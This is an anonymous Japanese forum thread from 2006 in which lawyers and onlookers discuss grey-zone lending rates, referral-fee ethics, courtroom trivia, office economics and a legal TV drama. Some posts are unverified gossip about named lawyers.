 裁判所は通常,「さいばんしょ」と発音することが多いけれども司法研修所
は「けんしゅうじょ」と発音する。
 昔湯島にあった研修所は,「民事執行センター」になったというのは本当かい?

723 :氏名黙秘:2006/04/18(火) 22:37:36 ID:ZU6zsLsw
弁護士さんに質問があります。
 サラ金のグレーゾーンの金利の部分がなくなると、
刑事にはならなくても、民事では争える部分がなくなってしまって、
弁護士さんの仕事も減ってしまうのではないでしょうか。
弁護士さんの仕事が減らないためにも、
グレーゾーン部分の廃止の政府方針について、
弁護士会は反対すべきではないのでしょうか。
(素人なのでよくわかりませんが)

724 :無責任な名無しさん:2006/04/18(火) 22:39:08 ID:59Zm1Owp
>>723
関係ない。
そもそも弁護士会が動く問題でもない。

725 :不漁辯護士:2006/04/18(火) 22:51:02 ID:banBdIB6
 東京地高裁に行くと,必ず玄関前(弁護士会と反対側の玄関)で何事かを演説している人がいる。何でも最高裁判事と東京高裁部総括と東京地裁部総括に対して損害賠償を請求したり,弾劾裁判請求をしているらしいのだが,よく分からない。

 日弁連会長選挙になると,「東京三会合同!!」と言って,選挙カーに乗っている弁護士さんがいて,「さすがに日弁連選挙は力が入っている」と思った。


726 :723:2006/04/18(火) 22:52:13 ID:ZU6zsLsw
>>724
わかりました。
ありがとうございました。

727 :無責任な名無しさん:2006/04/18(火) 22:55:33 ID:JmWdxzDN
>>725
法廷で裁判官に包丁で切りかかるより演説や国賠の方がいい。
裁判官殺害の故意を肯定して正当行為を主張する被告人の国選だったら・・・。

728 :不漁辯護士:2006/04/18(火) 23:08:07 ID:banBdIB6
>>727
 今度,日本刑法学会(立命館)で高山加奈ちゃん先生が,「違法性の意識」の分科会でコーディネーターをやるので,すべからく拝聴すべし。afoな裁判官には,afoと言えばよいのである。afoな被告人には,コンコンと説教をするのが相当であろう。

729 :無責任な名無しさん:2006/04/18(火) 23:09:05 ID:+lUmRJEg
>>725
アジアシステムではないだろうか。グクルとHPでてくるよ。
こういう人が法律相談に来たらどうしよう・・・
代理人も商工会の法律相談からだったからみたいだし可哀想に・・・

730 :不漁辯護士:2006/04/18(火) 23:14:06 ID:banBdIB6
 裁判官の席(法壇)の机には,こっそりと「非常用スイッチ」が仕込まれている。
 いたずら半分に押してみたら,庁内中にけたたましい警報音が鳴り響いた。

731 :無責任な名無しさん:2006/04/18(火) 23:20:40 ID:JmWdxzDN
>>730
もともと警報音は法廷棟で鳴らさないようになっているお
部の書記官室と守衛室で非常灯が点灯して警報音の仕組みだお
(ウソを書くのは止めようねw)

732 :無責任な名無しさん:2006/04/18(火) 23:28:54 ID:OqeUMD64
>>685

ということは、10万円以上の元本の貸金については制限利息が上昇するってこと?

733 :無責任な名無しさん:2006/04/19(水) 01:24:59 ID:Sr3tUJ/Z
>>722
湯島の研修所跡に執行官室と調停部が間借りしたのは,かなり前のことです。
執行センターは学芸大学に出来ました。


734 :無責任な名無しさん:2006/04/19(水) 01:33:03 ID:7VP+ycXu
渋谷法律事務所の荻○弁護士さん
去年の7月、ある都内の共産党法律相談において、あなたから浴びせられた暴言は一生忘れられません。
今、順調に訴訟が進んでいますので、決着がついたら、うちの代理人を派遣して
「著しい精神的苦痛を受けた」として抗議させてもらいます。


735 :無責任な名無しさん:2006/04/19(水) 01:35:36 ID:Qk6B5k+G
以前、東京地裁に傍聴に逝った際にたまたま裁判所の職員が
法廷に1人いて裁判官席に座らせて下さいってお願いしたら
座らせてくれたよ。裁判官席から法廷を見渡した気分は
最高だね。お馴染みの「被告人に退廷を命じます」なんて
言ってみたりなんかしてね。確かに裁判長席のところには
緊急時の非常ボタンが付いていましたね。当然、ボタンは
押さないでねって事前に言われましたが。

最高裁大法廷や小法廷の判事席にも座ったことありますが
さすがに非常ボタンは付いていませんでした。

736 :無責任な名無しさん:2006/04/19(水) 02:20:19 ID:pyyazCg5
>>735
最高裁の大法廷と小法廷にも非常ボタン(守衛報知器)があります
お気付きにならなかっただけと思われます

737 :無責任な名無しさん:2006/04/19(水) 07:15:17 ID:kMJpd8N5
非弁の書き込みを禁ずる

738 :無責任な名無しさん:2006/04/19(水) 08:52:07 ID:RB2ddC1m
>>732
にほんごだいじょうぶか?

739 :無責任な名無しさん:2006/04/19(水) 09:32:46 ID:CcbOIwW/
>>738
「グレーゾーン金利を廃止する方針です。金利の上限を20%に引き下げる案が有力です。」
だったら、利息制限法上限利息は引き上げになるとしか理解できないが。


740 :異端弁:2006/04/19(水) 09:46:33 ID:tqmqaeIe
売春と高利貸しはローマ時代からの最古の職業
人間の欲望に根ざしているから絶対になくならない
グレーゾーンを廃止するとヤミ金が増えるという貸金業界
の主張にも一理あることは事実だろう。
また、社会のクレジット機能が縮小するから、景気が悪くなることも
事実だろう。多重債務者ほど浪費するからね。
煩悩の塊である人間は、澄みきった水には住むことはできない。
あるべき理想像だけを求める姿勢にはどうも違和感を感じるね。

741 :無責任な名無しさん:2006/04/19(水) 09:56:03 ID:PnqHlxua
多重債務の資本の流れを追ってみ。
水商売やら賭博やら、ダーク社会の潤滑油。
そんなところを潤しても大勢に影響なし。
よって却下。

742 :無責任な名無しさん:2006/04/19(水) 09:57:47 ID:2XMkdbFg
>>739
「現在、借 り手が支払う金利の上限は、利息制限法の20%と出資法の
29.2%がありますが・・・」っていう部分からすれば、利息制限法に合わ
せるっていう意味だと思うが。どこにも引き上げの話なんか書いてないし

743 :TN:2006/04/19(水) 10:14:03 ID:R646tmjl
オレもグレーゾーン廃止なら闇金が復活すると思う
廃止して欲しくない弁護士も実際のところ多いと思う


744 :無責任な名無しさん:2006/04/19(水) 10:14:43 ID:V1bnDpj0
ずさんな破産申立をしている司法書士に注意
http://www.bengoshisoudan.com/column/column041104.html

745 :無責任な名無しさん:2006/04/19(水) 10:31:12 ID:1h5WWYFU
>740
 真偽を確認したわけでは有りませんが、弁護士もローマ時代からの職業と聞きます。
人間が、欲望に抗いきれない不完全な存在である限り、弁護士という職業は続くのでしょうね。

 ちなみに、現状では、引きなおし計算にマンパワーを食われるので、グレーゾーンは要らない。
10年後には考えが変わっているかもしれないが。

746 :異端弁:2006/04/19(水) 10:32:50 ID:rdPP2Fzm
ダーク社会の潤滑油ということはないだろう
サラ金には、銀行や外資やノンバンクが貸しこんで利益を上げている。

放送業界やネット業界は、広告料で多額の収益を上げている。
国は、多額の法人税で潤っている。
貸しビル業者は、多数の店舗賃貸で潤っている。
借金をして、液晶テレビや、中古自動車を購入したり、遊興費に消費するから
製造、小売業界も潤っている。

弁護士業界にとっては、法曹人口拡大の、司法書士業界にとっては登記件数減少
に収入をカバーをした支えしているのも事実だ。センターの相談件数が減少しただけで
相談料を無料化するとうオタオタしているのに、一体どうするのかな?

747 :無責任な名無しさん:2006/04/19(水) 10:56:51 ID:RUTvD7Xq
>>745
そんなにマンパワー食われる?事務員が読み上げるのを入力するだけじゃん。
事務員が二人いれば、弁護士がやる部分って、電話かけて交渉するだけでしょ。


748 :無責任な名無しさん:2006/04/19(水) 11:06:59 ID:5+p9cE7H
俺、結構引き直し作業好きなんだよな。
「お、ちゃんと返済している。元金が順調に減っているなぁ♪」
「おい、何でここでこんなに借り入れすんねん。もうちょっとで過払いだったのに〜。」
とかつっこみながら入力している。


749 :無責任な名無しさん:2006/04/19(水) 12:05:45 ID:B16ULphG
>748
俺も結構好き。その債務者の性格が見えるときもあるし。

T富士のは見にくいのであまり自分ではやりたくないけど、事務員さんより
立場の弱いイソ弁なので、しこしこ入力してる。

750 :無責任な名無しさん:2006/04/19(水) 12:56:35 ID:1h5WWYFU
>747
 事務員の時間が取られるのが嫌なのです。残業手当も馬鹿になりませんし、他の業務へも悪影響が出ます。
特に、2年ぐらい前はすごかった。

751 :無責任な名無しさん:2006/04/19(水) 13:11:39 ID:sub1XFhw
>>745
ジュリアス・シーザーも、一時期弁護士してました。

752 :無責任な名無しさん:2006/04/19(水) 14:27:58 ID:e0YRunu8
>>740
サラ金が,「制限金利を下げるとヤミ金に流れてヤミ金が増える」と言うことは,
サラ金が,今やってる営業が,「ヤミ金と一緒」と自認しているようなもんだ。
語るに落ちる。

753 :無責任な名無しさん:2006/04/19(水) 14:45:35 ID:R5Erkuew
>752
 おまいも日本語だいじょうぶか?

754 :無責任な名無しさん:2006/04/19(水) 14:47:52 ID:HfIyiQ9/
>>752
一見するともっとものように見えるけど・・
弁護士は友達にほしくないなw

755 :無責任な名無しさん:2006/04/19(水) 16:02:00 ID:B16ULphG
安○弁護士って、死刑廃止フォーラムに本村氏を呼んだの?
他のところで、頼み込んで出てもらって被害者から死刑を求める意見を
話してもらっていたと読んでショックを受けた。
デマだと思いたい。

弁論欠席も、突然の傷害致死主張も、死刑廃止論も、他の事件についても、
頭が下がることだと思ってる。
けど、一応誠意を持ってフォーラムに出てくれた人の、まさにその加害者側に
付くとは。
直接の利害関係があったわけではないにせよ、普通は別の弁護士に回すよな。

756 :無責任な名無しさん:2006/04/19(水) 18:04:02 ID:bwpnknyf
>>752がおかしいとは思わないけどな。

ま,非弁の書き込みを禁ずる。
ヤミ金復活しないと思うよ。踏み倒し自由だと言うことを周知徹底すればよい。

法テラスも年間3000人弁護士もあるしねw

757 :無責任な名無しさん:2006/04/19(水) 18:04:24 ID:IQ6UaLmk
こないだ無罪になった競売妨害だけど、
昨今の安田の言動を考えると、高裁で有罪になりかねないね。

758 :無責任な名無しさん:2006/04/19(水) 18:12:32 ID:RWPg/2DM
このスレおもすれー

759 :無責任な名無しさん:2006/04/19(水) 18:25:50 ID:mgoi0r24
>>755
このコピペのことかな?
自分は会見でやってた紙芝居もどきに引いたよ。
あれは神経逆なでするだけだろと。

239 名前:名無しさん@6周年[] 投稿日:2006/04/19(水) 12:57:46 ID:P5/lT6FH0
>>173
頭がおかしいというか・・・
なんか死刑是か非かって討論会があって
本村さんが被害者側のパネリストとして呼ばれた
で死刑廃止論者の安田が論破されて負けたのが
被告側の弁護士になった動機だと安田本人が言っていた
要するに私怨だな
もう、法の正義や死刑制度是非や被告の人権ですらどうでも良い
面子を潰されたのを恨んで本村さんに嫌がらせしているだけだよ


760 :無責任な名無しさん:2006/04/19(水) 19:17:12 ID:IVdiTdI6
ソースも怪しげな書き込みに踊らされるなよ・・・

761 :無責任な名無しさん:2006/04/19(水) 19:18:26 ID:jmGLhu+J
ニュー速から飛んできたド素人なんですが、ぶっちゃけ光市母子惨殺事件の判決は
現役弁護士さんの目から見てどうなりそうですか?やはり無期は覆らずですか?

762 :無責任な名無しさん:2006/04/19(水) 19:26:52 ID:5+p9cE7H
>>761
記録読んでいないので知らん。
ニュー速へ戻りなされ。

763 :無責任な名無しさん:2006/04/19(水) 19:40:55 ID:kufs/9tG
意趣返しを理由に弁護活動しちゃならんという法律はないでしょ。
官舎ビラ撒き事件もリンクさせていろいろやるみたいね。

764 :無責任な名無しさん:2006/04/19(水) 19:50:19 ID:KU07eDs4
>>735-736
でも、裁判官席って座らせてもらえるものなんだね。
俺も一度座ってみたい。
法服も一度着てみたいね。

765 :無責任な名無しさん:2006/04/19(水) 19:55:15 ID:5+p9cE7H
>>764
修習生の時そういう機会あったでしょ。


766 :無責任な名無しさん:2006/04/19(水) 20:14:20 ID:n0wH4yhY
>>765
非弁を相手にするな

767 :無責任な名無しさん:2006/04/19(水) 21:45:49 ID:A5J3DMyE
アエラに弁護士の納税ランキングが載ってましたね。
毎回思うのだが、なぜ東京の弁護士だけなんだろ?
私の知ってる地方弁護士は、あのランキングに載るくらいの
納税額なんだけどなあ・・・
地方も含めたランキングつくってくれないかな


768 :無責任な名無しさん:2006/04/19(水) 22:14:50 ID:6A03CjGn
>>767
 納税ランキングに入っている弁護士って、
法廷で弁護士をしている訴訟弁護士じゃなくて、
渉外弁護士じゃないですか。
 渉外弁護士なら、東京でしか仕事はないと思うよ。
 

769 :無責任な名無しさん:2006/04/19(水) 22:41:55 ID:bGqcdGZ5
 漏れは,弁護士法人の社員をやっている弁護士から話を聞いたことがある
のだが,弁護士(自然人)が持っているゴルフ会員権(当然のことながら不
良資産)を自分が経営している弁護士法人に売りつけて,節税したのだそう
だ。よく分からない話なのだが,その弁護士さんは所得税の還付があるらし
い(よい子の弁護士さんは真似しちゃだめだよ)。
 私は,毎年60万円減価償却する自家用車に乗っていることになっている。
 要するに地方都市弁護士は,長者番付に乗らないように色々と知恵を絞って
いるということだ。長者番付に乗ったり勲章をもらったりすると,「あの先生はと
ても偉いし,税金も沢山納めている」というあらぬ風評がたち,従前のお客が離れ
たり,逸失利益が生ずるらしいのだ。

770 :無責任な名無しさん:2006/04/19(水) 22:50:58 ID:bGqcdGZ5
>>729
 地方都市の単位会には,「スキー場」とか「海の家」とか「○○神社」
の敷地内に「秘伝書」が埋められている。そこには,「この依頼者
の事件は受けてはいけない」・「民事訴訟(依頼者・相手方)で難儀をし
た鷺誌と思われる人」等のリストが記載されている。

771 :無責任な名無しさん:2006/04/19(水) 22:57:53 ID:bGqcdGZ5
 いわゆる法服(正式名称は「職服」と言うらしい)は高島屋製と三
越製の二系統がある(タグで確認した)。クリーニングに出す
ときは,「ローブ」とか「牧師の仕事服」と誤魔化して持ち込むらし
い。
 最高裁裁判官の法服は,園田直(だったかなぁ?東大の行政法学者)による
と下級祭裁判官よりちょっと高級な仕立てらしい。着たことも見たこともない
ので,よく分からない。

 退廷の際,ドアーのノブに裾を引っかけ右裾をを法廷に置いてきた裁判官を知っている。

772 :無責任な名無しさん:2006/04/19(水) 23:05:52 ID:bGqcdGZ5
【花見は】【まだか?】
 イタリアンレストラン(タベルナ?)で花見をしながらディナーを食することになっているのだが,憂鬱だ。
 私は,クリスマスからイースターまで不安神経症が増悪するのだが,イースターが開け
たとたん宗教関係の訴訟の準備書面を書かないといけない。鬱出汁能生。

773 :無責任な名無しさん:2006/04/19(水) 23:16:31 ID:A5J3DMyE
>>769
長者番付も今年までなんだよね。来年は廃止

774 :無責任な名無しさん:2006/04/19(水) 23:50:36 ID:WaSabbGC
>>771
園田直は大平内閣の外務大臣だ。

おまいが言ってるのは園部逸夫か。
園部逸夫は行政法学者から最高裁判事になった人だが、
所属していたのは東大でなく成蹊大だし、出身校も京大で、
東大系列ですらない。
http://d.hatena.ne.jp/keyword/%B1%E0%C9%F4%B0%EF%C9%D7

775 :無責任な名無しさん:2006/04/19(水) 23:56:35 ID:95jacZ5o
>>725
ああ、あの場かはアジシスだよ。ビール箱みたいなのに腰掛けて拡声器のマイクを口元に、拡声器を床に置いて原稿を読んでいるメガネのおじさんね。

2ちゃんでも有名だよ。


776 :無責任な名無しさん:2006/04/19(水) 23:57:10 ID:5akDSU22
            , -'"´  ̄`丶、_
           ,.∩         `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_



777 :無責任な名無しさん:2006/04/20(木) 00:04:16 ID:dg67W5O1
>>775
アジシスのおっちゃん、見たこと無いんだよな。弁護士会館側から入るもんで。
2チャンではよく見かけるけど。いつ行ったらみれるかな。

778 :無責任な名無しさん:2006/04/20(木) 02:04:31 ID:engRSNWp
 準備書面を書いている合間に気分転換で弁護士大観(法律新聞社刊行)を開いてみたが,あれは詐欺だよね。
 弁護士になり立てのころの肖像写真が,20年ー30年たった後もそのまんま掲載されている。
 K先生なんて10年以上前から禿で白髪頭なのに,髪の毛がふさふさして7/3分けしている。弁護士になり立て
のころは,秀才顔だったのだが,その後いろんな人生を送り風采の上がらない親爺的な人相風体になってしまった様子である。
 ところで「弁護士大観」直近の肖像写真を送っている弁護士さんはどれくらいいるのだろうか? 私の憶測では,20%程度だと思う。

779 :無責任な名無しさん:2006/04/20(木) 02:10:32 ID:engRSNWp
>>771
 そうそう,園部逸夫先生だ(園田直と紛らわしい)。園部さんは,クラシック音楽に造詣が深く
グレン・グールドのモーツァルトソナタは一度聴いてみると良いかも知れないが,2度も3度も聴
く気にはなれないとか,グールドのインベンションとシンフォニアは何回も聴くべきものだといっ
ていた(NHKラジオ)。ちなみに,私の国際法の恩師は,キティみたいなワグネリアンで,毎年,ド
イツまで「指輪」を聴きに行っているそうだ。

 私は,行政法の勉強では,柳瀬良幹の教科書を使った(へんてこケルゼニアーナ)。

780 :無責任な名無しさん:2006/04/20(木) 02:20:48 ID:engRSNWp
>>725

 鳥肌実みたいだな。
ttp://www.geocities.jp/oresama_ism/movie/haijin.swf

781 :無責任な名無しさん:2006/04/20(木) 03:05:34 ID:j1OrEptA
紛らわしくねえよ
関係ないこと延々書いてごまかしてんじゃねぇ

782 : ◆mhOvIIMW3c :2006/04/20(木) 05:14:52 ID:C34DLugU
age

783 :無責任な名無しさん:2006/04/20(木) 08:06:06 ID:OfVGkNUX
園部逸夫は行政法関係のコンメンタール等でお馴染みですが
園部直って法律関係で業績があるのでしょうか

784 :無責任な名無しさん:2006/04/20(木) 09:13:33 ID:XkcHqFoD
>778
若い頃の写真を延々と見られる方が嫌だと思うんだけど、年取ると感覚が
違ってくるんだろうか。

俺は弁護士大観には写真も取扱分野も何も送ってないけど。
最初に面倒で送るの忘れてそのまま。
高すぎるしどうせ自分では買わないし。


785 :無責任な名無しさん:2006/04/20(木) 15:41:18 ID:j5sJeZVH
>>783
園部直って、誰?

786 :無責任な名無しさん:2006/04/20(木) 15:43:54 ID:NLyK4zTz
園部直
園田逸夫

787 :無責任な名無しさん:2006/04/20(木) 16:08:58 ID:dUnnj1cI
久々に、デンパな人の法律相談にあたっちまったい。

788 :無責任な名無しさん:2006/04/20(木) 16:53:49 ID:j5sJeZVH
>>779
つーか、あなた、新潟で懲戒くらってたバームクーヘン先生?

789 :無責任な名無しさん:2006/04/20(木) 21:21:24 ID:Qzg6Z2ga
皆さん、弁になった動機は何ですか?
オレは世襲なんでしょうがなく弁になった。
こんな退屈な毎日が続くと鬱になる。


790 :無責任な名無しさん:2006/04/20(木) 21:27:36 ID:w4JbQNY5
弁護士ドットコムと司法書士ドットコムの法律相談料金が同じだというのは
なめてるね。


791 :MS754 ◆yGUnQdhyV2 :2006/04/21(金) 00:11:06 ID:Qol8XMrx
>>775
え!?あの人、アジスさんだったんですか!?

792 :無責任な名無しさん:2006/04/21(金) 01:01:27 ID:6mUswgoa
>>790

弁護士会は、結局、弁護士ドットコムを放置するようですね。

結局、弁護士の有償斡旋行為であれ何であれ、やったもの
勝ちですか。


793 :無責任な名無しさん:2006/04/21(金) 01:30:59 ID:rxBVrmeX
弁護士同士だと、事件の優勝斡旋というか、事件回して少し貰ったりするからなあ・・・
批判できんわな。

794 :無責任な名無しさん:2006/04/21(金) 06:12:38 ID:yDCIwy9B
遠方にいるけど、一度アジシスは見てみたいものだ。
まだしばらくは居そうかなぁ?
夏休み期間には上京の予定があるのだが・・・

795 :無責任な名無しさん:2006/04/21(金) 08:49:50 ID:RL73tbuO
テレビ朝日で橋下がアイフル批判してる。信じられん。お前シティズの代理人として何やった。

796 :無責任な名無しさん:2006/04/21(金) 09:29:52 ID:gpI9xK5t
確か顧問だったんじゃないの?

797 :無責任な名無しさん:2006/04/21(金) 09:43:44 ID:7xsoTeUS
アイフルがシティズを買収した頃に代理人辞めたような気がするから、もしかするとアイフルにシティズ代理人を首にされてて、その私怨があるのかもしれないw

798 :無責任な名無しさん:2006/04/21(金) 10:09:28 ID:sTXuwrFz
今日は日掛け金融相手の債務整理だよ。
しかし、あれだけ怪しげな業者でも、貸金業登録認められてるんだなあ。

799 :無責任な名無しさん:2006/04/21(金) 10:15:55 ID:RL73tbuO
>>797
アイフルの子会社時代の代理人だよ。
やめたのはシティズ勝訴事件の上告審で口頭弁論が開かれることが決まってから。
さすがラガーマンの逃げ足の早さw

800 :無責任な名無しさん:2006/04/21(金) 10:50:18 ID:twQxUuCy
下駄を履いて法廷にきてたような覚えがあるな。

801 :無責任な名無しさん:2006/04/21(金) 13:15:44 ID:ucYRfI8t
>>793
共同受任にしてもらって報酬を一部貰うならいいだろうけど,斡旋して対価を貰うと弁護士といえども懲戒では?

802 :無責任な名無しさん:2006/04/21(金) 19:29:11 ID:UniAzH5+
東京のクレサラMLは、最近、相談担当交代用の掲示板と化している。
「誰か交代して」というメールがあると、10分後には「交代みつかりました」となる。
ほとんどテレクラ状態w みんな必死なんだな。
これで弁護士が増えたらどうなっちゃうんだろうとマジで思う。

803 :無責任な名無しさん:2006/04/21(金) 19:40:41 ID:TmrjhziG
職にあぶれた新人用に無料クレサラ相談を毎日やればいいんだよ。
そうか国選を月1件配給する。
これでなんとか食えるだろう。

804 :無責任な名無しさん:2006/04/21(金) 22:16:45 ID:jVlWH/7E
>>801
それは問題ないはずだけどなあ。
弁護士以外から事件を紹介してもらって対価を支払うのがダメなだけだったような。

805 :無責任な名無しさん:2006/04/21(金) 22:24:14 ID:DSPFZ9WT
>>804
弁護士職務基本規定13条は,客体を非弁護士に限定していない。

806 :無責任な名無しさん:2006/04/21(金) 22:27:58 ID:qtyhGumU
>804
まずいよ。「対価としては」お金を渡したり饗応したりしてはいかんね。

807 :無責任な名無しさん:2006/04/21(金) 22:29:39 ID:AddEZEBP
>>803
地方にくれば十分食えるよ。収入は都会ほどではないが、事務所経費も安く済む。
つうか地方にきてくれ。忙しくて死にそうだ。

808 :無責任な名無しさん:2006/04/21(金) 23:03:54 ID:DSPFZ9WT
ゼロワンに行けば,年間所得3000万はすぐだね。

809 :無責任な名無しさん:2006/04/21(金) 23:38:43 ID:paHjlb/B
法務省民事局商事課は、今年の1月20日に回答を出した。
ところが、日付が平成17年になってて赤っ恥。
あとから訂正したものの、今度はタイトルが間違えてて赤っ恥。
また訂正。
質問のタイトルと、回答のタイトルが全然違うんだから、笑事課らしいやね。

810 :無責任な名無しさん:2006/04/22(土) 04:13:06 ID:BIVBAlAz
近未来

http://japanese.chosun.com/site/data/html_dir/2005/03/21/20050321000076.html

811 :無責任な名無しさん:2006/04/22(土) 09:01:39 ID:fWyZ9yiy
言っとくか地方に来ても稼げない奴は稼げないぞ
僻地に行け
県庁所在地はもう飽和が近いよ

812 :無責任な名無しさん:2006/04/22(土) 09:04:13 ID:9lHm8V+O

人口比で考えても、日本はとっくにそれ以上の人数になっているのだが・・・

813 :無責任な名無しさん:2006/04/22(土) 09:48:51 ID:du7l5db7
>>805
>>806
まあ、紹介料、ってかたちで渡すのはまずいだろうけど、ちょっと一緒にのみに行ったときに飯おごったりするのは全然平気でしょ。
だいたい、それをやって誰が懲戒請求するのだ?

前に、買ったけれどどうも気に入らなくて1度しか付けなかったネクタイ(エルメス)をお礼としてあげたことがあったなあ。。。
まずい?

814 :無責任な名無しさん:2006/04/22(土) 10:05:21 ID:7ObqnzAu
仕事の斡旋は事務所内でよくあるんですけど・・・


815 :無責任な名無しさん:2006/04/22(土) 10:18:46 ID:fqTfkIbH
事務所内の斡旋ね・・・。
ボスがどこかから持ってきた変な事件を回され、「これちょっと俺の名前入って
いるとまずいんだよね〜。一人でやってくれる?」などと言われて丸投げ。
その挙げ句、上納金を納めさせられる。
紹介料払って絶対断りたい事件をやらされているような気分。
連名ならまだ我慢もできるが、単独受任させてお金は巻き上げるなら紹介料だろ!

と言いたい。辞める日が来たら是非言って去りたい。


816 :無責任な名無しさん:2006/04/22(土) 11:54:45 ID:GxFFuqa1
>>815
ご愁傷様です。

817 :無責任な名無しさん:2006/04/22(土) 12:03:34 ID:KjZp8TJU
>>815
まあまあ。イソ弁時代のボスは、独立後にちょくちょく仕事回してくれる存在でもあるので、
結構ありがたい存在だったりするんだよ。イソ弁時代はつらいが、がんばってくれ。
まあ、精神的にかなりつらいのなら、独立しちゃうのも手だけどね。これから弁護士も
増えてくるんで、さっさと独立して地盤を築いたほうがいいかも。
地方なら、手元に300万〜400万程度あれば十分独立できるぞ。

818 :無責任な名無しさん:2006/04/22(土) 12:57:25 ID:7La82kJf
単独受任した場合に,事務所経費として上納金をとるのは
珍しくはないし,不当でもないと思われるが。

まあ,俺は1年で独立したけど,
元のボスとは喧嘩別れはしないほうがよいね。

後で仕事回してくれるという実利を別にしても,
ボスと喧嘩別れしたイソ弁は,少なくとも地方では
周りから変な奴と見られる。



819 :無責任な名無しさん:2006/04/22(土) 13:06:38 ID:GxFFuqa1
66 :氏名黙秘 :2006/04/22(土) 04:21:20 ID:???
>>37

確かに当番,相談の引取りのスピードはあっという間ですね
若手の小遣いかせぎの国選も,どんどん取りにくくなっていますし

初任給引下げを検討する事務所もあるようですね
町弁初任600万円×2名採用より
400万円×3人採用の方が,経営側,今後の修習生双方にとってよいとする考えを,
この前,別の事務所のボスから飲み会の席で聞きました

いやな時代ですね
10年前とは隔絶の感があります

820 :無責任な名無しさん:2006/04/22(土) 18:34:55 ID:8ixIV2tJ
グレーゾーン廃止、ひっくり返らんかね。

821 :無責任な名無しさん:2006/04/22(土) 18:48:24 ID:9lHm8V+O
無理だろ。もうあぶく銭は期待するな。

822 :無責任な名無しさん:2006/04/22(土) 19:16:03 ID:qT4EK+eQ
詭弁業者、乙

823 :無責任な名無しさん:2006/04/22(土) 22:15:33 ID:Y6vUyVYA
元ボス弁から事件が来る実利だって。

大体、この世界で、着・報酬が沢山貰えて簡単に解決する見とおしの事件を他の弁護士にまわす奇特な人が居るんですか。
私には、今まで、同業者(元ボスはその人格を知悉しているので、当初から事件紹介を受けない方針を堅持)からは、ややこしい負け筋の事件や、うるさくゴチャを言ったり、報酬を払わん依頼者の事件しかこなかったですが。


824 :無責任な名無しさん:2006/04/22(土) 23:26:45 ID:du7l5db7
>>815
それはイソ弁であっても、きちんと言った方がいいよ。
「先生の名前が入っていないのなら私への事件依頼だと思います。そうすると、私が受けるかどうかをまず決めさせてください。」
と言うべき。

825 :無責任な名無しさん:2006/04/22(土) 23:34:04 ID:eVTlbNMR
>>823
私は,簡単ではないが報酬たくさんの事件も,まわしてもらっています。
簡単で報酬たくさんの仕事は,回ってきませんな。

826 :無責任な名無しさん:2006/04/22(土) 23:41:59 ID:RAuJyMZ0
>>823
顧問先の関係とかで自分でしたくても出来ない事件なら回さざるを得ない

827 :無責任な名無しさん:2006/04/23(日) 02:04:44 ID:GdAacnX7
すいません。話の流れと何の関係もないですが。お暇な方がおられたらレスください。
弁護士会(弁護士協同組合?)のダイナースって作られた方いますか。
普通にダイナース持つのと比べて何かいいことあるんですか(弁護士だから何か優遇されるとか?)
特にないなら普通のダイナース持ちたいんですが(何か気恥ずかしいので)。


828 :無責任な名無しさん:2006/04/23(日) 05:49:46 ID:pvhhWVBr
独立してから2年くらいは元ボスから仕事を回してもらったな。
手間がかかる仕事も多かったら,暇だったので特に苦にはならなかった。
元ボスから来た仕事でも,依頼者に面談した結果,
断った仕事も多かったけどね。

まあ,独立後の元ボスとの関係は,いろいろなんじゃないの。

829 :無責任な名無しさん:2006/04/23(日) 10:24:53 ID:VXdDVBk7
詳しい方がいらっしゃったら検事について教えてください。
いま法学部に在籍していて、医学に興味が出てきていろいろ調べていたのですが、医者は割に合わない仕事だというのに気づき相当迷ってます。
それで検事の勤務内容,年収,福利厚生を教えてもらえれば比較して決められる手助けにできると思うので、よろしくお願いします

830 :無責任な名無しさん:2006/04/23(日) 11:05:22 ID:QwmfhNIi
NHKの土曜ドラマのマチベンってどうですか?
実際マチベンの皆さんから見て。

831 :無責任な名無しさん:2006/04/23(日) 11:19:07 ID:XA1mL7Ut
>>829
医者と法曹をはかりにかけている時点で法曹の資格がないことは明らか
今や法曹はエリートではない
検察官は犯罪者相手の仕事で体育会系のノリについていける人間で
なければやっていけない

832 :無責任な名無しさん:2006/04/23(日) 11:28:20 ID:OcOYsBET
>>827
別にメリットはない。余計なマークがついているだけ。
ステータスとして持つなら,ノーマルのダイナースを持ってる方がいいんじゃないかな。
たくさん使っても,インビテーションは来ないと思う。
年会費は安いのかもしれない。

833 :無責任な名無しさん:2006/04/23(日) 11:29:20 ID:OcOYsBET
>>829
そんなあなたは中堅のメーカーにでも勤めて管理職を目指すのが無難。

834 :無責任な名無しさん:2006/04/23(日) 11:51:18 ID:EG6ecj6/
なるほど、弁護士協同組合ダイナースでは黒カードにランクアップすることがないのですね
ありがとうございました

835 :TN:2006/04/23(日) 12:30:23 ID:Aj01p/ED
>>830
昨日はじめてマチベンを見たが昨日の回だけから判断すると結構よくできてると思った。
でもあれはマチベンではない。しいていえば人権派弁護士。
沢田研二の役柄がマチベンに最も近いと思う。
細かいことを言い出せばきりがないが所詮はドラマだからね。
ただ検事として求刑した事件を弁護士として関与するというのは業界人の倫理観には反するね。
懲戒にはならないと思うんだけど。

ちまたの評判では弁護士のクズが最も評判が良い模様。
(DVDレコーダには録画してあるがまだ見てない)

836 :無責任な名無しさん:2006/04/23(日) 15:06:47 ID:VvswhjtC
弁護士協同組合と提携するカードのメリットは
単位協同組合と全弁協に,利用高に応じて
クレジット会社から上納金が納付されること。

カードを持ってる個人にはメリットはない。
まあ,単位協同組合の財政が潤うことによって
間接的なメリットはあるかもしれないが。


837 :無責任な名無しさん:2006/04/23(日) 16:01:19 ID:QwmfhNIi
>>835
コメントどうもです。
しかし最近弁護士ものとか法廷もののドラマが増えてきましたね。
白い巨塔を筆頭として、そこそこ視聴率を稼ぐからだろうけど。

838 :無責任な名無しさん:2006/04/23(日) 16:37:10 ID:fdUoh4y9
>>835
